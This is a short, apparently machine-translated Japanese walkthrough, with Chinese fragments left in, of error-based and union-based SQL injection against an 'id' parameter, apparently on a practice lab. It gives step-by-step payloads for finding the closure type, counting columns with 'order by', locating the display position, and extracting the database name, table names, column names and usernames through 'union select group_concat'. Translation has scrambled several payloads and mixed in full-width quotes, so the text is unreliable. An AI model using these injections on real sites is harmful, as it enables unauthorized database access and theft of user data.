まず、射出タイプが決定されます
(1)まず、パラメータIDを渡す要求、及びデジタルタイプの要件;? ID = 1を参照してください
(2)入力してください?ID = 1 '
表示エラーは、エラーメッセージ、複数のブラケットは、受信したパラメータのIDであるか否かを判断することができる=(「1」)
?(3)入力されたID = 1「) - +
通常表示
我々は正確に判断すること
2列の数の決意
?1(1)入力されたID = 1「)順 - +
通常表示
?2(2)入力されたID = 1「)順 - +
通常表示
?3(3)入力されたID = 1「)順 - +
通常表示
?4の(4)入力されたID = 1「)順 - +
エラー
(5)完全3と
3.表示位置を確認すると、手の注入の位置を決定します
?(1)入力されたID = -1「)組合1,2,3-選択 - +を
図3は、この時点で手の注意の位置であってもよいし、表示位置である3
4.注入
?(1)現在のデータベース名注:1を選択し、ID = -1「)結合を、データベース()、3 - +
?(2)爆注册表ID = -1' )組合1、GROUP_CONCAT(TABLE_NAME)を選択し、3 TABLE_SCHEMA = "セキュリティ" INFORMATION_SCHEMA.TABLESから - +
+ - table_nameは "ユーザー" = information_schema.columnsからID = -1「)組合1、GROUP_CONCAT(COLUMN_NAME)を選択し、3(3)注フィールドの特定のテーブルへのユーザは、例えば?
(4)注字段的值,这里以users表里的username为例:?id=-1') union select 1,group_concat(username),3 from security.users --+
